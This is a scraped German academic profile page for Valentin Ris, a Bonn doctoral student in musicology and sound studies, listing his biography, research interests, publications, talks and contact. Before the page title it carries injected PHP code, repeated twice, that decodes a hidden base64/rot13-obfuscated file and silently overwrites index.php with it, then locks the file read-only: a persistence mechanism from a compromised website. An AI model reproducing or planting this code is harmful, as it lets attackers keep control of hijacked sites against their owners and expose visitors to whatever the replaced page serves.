$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Valentin Ris – Auditive Medienkulturen

Valentin Ris

Kurzbiographie

Valentin Ris ist aktuell Doktorand an der Universität Bonn und arbeitet an seinem Dissertationsprojekt zu einer „Archäologie der Digital Audio Workstation“.
Zuvor schloss er 2017 das Bachelor-Studium der Musikwissenschaft/Sound Studies und Germanistik (Bonn), 2018 den Research-Master an der a.r.t.e.s. Graduate School for the Humanities sowie 2020 das Master-Studium der Musikwissenschaft an der Universität zu Köln mit der Arbeit “Sonale (Un-)Aufmerksamkeit. Eine Archäologie ihrer Aisthesis und Ästhetik” ab. 2018/19 absolvierte er ein Auslandssemester an der School of Music der Cardiff University.
Seit 2017 arbeitet er als freier Mitarbeiter für den WDR (Online / Social Media / Radio).

Interessen

  • kulturwissenschaftliche, wissen(schaft)shistorische und medienepistemologische Fragestellungen an Sound & Musik
  • musikalische Medien und ihre Theorie / Medientheorie
  • Instrumente und Interfaces
  • Techniken und Technologien musikalischer Praxis
  • Digitalisierung, Digitalität von auditiver Kultur

Publikationen

Wissenschaftliche Zeitschriftenartikel (peer reviewed)

  • „The Environmentalization of space and listening. An archaeology of noise-cancelling headphones and Spotify’s concentration playlists“, SoundEffects. An Interdisciplinary Journal of Sound and Soundexperience 10/1 (2021), S. 158-172. https://doi.org/10.7146/se.v10i1.124204
  • „Discursive Power: On Canon, Language, and Music as Dispositif“, in: The Jagiellonian University Young Musicologists Quarterly 41/2 (2019), S. 5-22. https://doi.org/10.4467/23537094KMMUJ.19.004.10811

Unterschiedliche journalistische Texte / Medienbeiträge für WDR 3, Deutsche Welle.

Vorträge

  • „Das (Ge-)Horchen der Kontrollgesellschaft. Archäologie und Beobachtungen zweier Techniken und ihrer Technologie“, Acoustic Intelligence. Hören und Gehorchen, Jahrestagung der AG Auditive Kultur und Sound Studies (Gesellschaft für Medienwissenschaft), 30.01.-01.02.2020, Heinrich-Heine-Universität Düsseldorf
  • „Medium und Form. Theorie und Methode für eine kulturwissenschaftliche Musikwissenschaft“, Musik und Ästhetik. Alte Fragen, neue Perspektiven, 31. DVSM-Symposium, 8.-10.11.2018, Humboldt-Universität zu Berlin

Kontakt

Mail: vris [at] uni-bonn.de

https://uni-bonn.academia.edu/ValentinRis